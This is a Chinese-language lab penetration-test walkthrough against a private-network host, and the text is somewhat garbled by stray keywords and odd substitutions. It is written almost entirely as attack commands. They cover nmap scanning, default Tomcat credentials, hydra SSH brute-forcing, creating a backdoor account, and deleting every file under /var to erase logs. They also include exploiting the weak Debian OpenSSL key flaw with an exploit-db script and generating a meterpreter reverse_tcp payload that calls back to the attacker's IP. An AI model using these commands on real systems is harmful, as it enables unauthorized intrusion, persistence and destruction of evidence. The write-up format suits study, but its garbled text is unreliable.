1对局域网进行主机发现扫描:php
nmap -sP 192.168.183.0/24html
2肯定攻击目标:本机ip地址为129,内网中还存在另外一台主机,ip为134,这就是咱们的目标,咱们对它进一步扫描。python
nmap -sV 192.168.183.134mysql
经过分析,咱们发现:目标主机开启大量可利用端口,ftp、ssh、telnet、smtp、mysql能够进行暴力破解,对方主机也开启了80端口,apache版本为2.2.8,php版本为5.2.4。linux
3放大招,使用nessus进行漏洞扫描。web
4在web扫描这里,我发现一些严重漏洞,这一个能够直接登录进去:sql
在这里,咱们发现如下信息:shell
网址:http://192.168.183.134:8180/manager/htmlapache
用户名:tomcatubuntu
密码:tomcat
网址:http://192.168.183.134:8180/host-manager/html
用户名:tomcat
密码:tomcat
网址:http://192.168.183.134:8180/manager/status
用户名:tomcat
密码:tomcat
好像发现了新大陆,咱们继续寻找可用信息。
咱们发现管理员路径为admin:
好像没太大用,因为时间比较紧,咱们进行下一步。
经过分析上一步的扫描结果,分析获得如下信息:
找到漏洞编号:
CVE: CVE-2009-3099, CVE-2009-3548, CVE-2010-0557, CVE-2010-4094
继续寻找以前nessus的扫描结果,找到如下内容:
找到漏洞编号:
找到漏洞编号,cve-2008-0166
在扫描期间,咱们先用hydra暴力破解试试,说不定运气好呢。
hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh
最开始使用上面命令,总是出现could not connect to target,查询了发现时由于线程开太多,被对方封了,因此改为1就能够正常运行。
hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh
Success: 'root':'ubuntu' 仍是root权限,接下来,直接用xshell链接就行了。
(5)建立帐户
Useradd hack
Passwd hack
123
123
(6)清除日志文件
find /var -type f -exec rm -v {} \;
经过暴力破解,咱们已经得到对方shell,这样好像有点简单。我想继续根据以前获取的信息进行攻击。
Msfconsole搜索,发现并无:
找到cve官网关于本漏洞的说明:
直接下载利用说明:
根据文档内容进行操做:
首先下载密钥文件:
上传到bt5并解压:
使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用脚本文件:
咱们随表找一个,我这里使用python脚本。
find / -name 5720.py
进入/pentest/exploits/exploitdb/platforms/linux/remote/,并执行破解:
python 5720.py /root/rsa/2048192.168.183.134 root
结果以下:
执行:
ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134
成功获取对方shell。
生成木马:
msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme
将木立刻传至目标主机:
在攻击机中开启服务端:
若是目标机不当心运行了木马文件,攻击机便可得到反弹shell。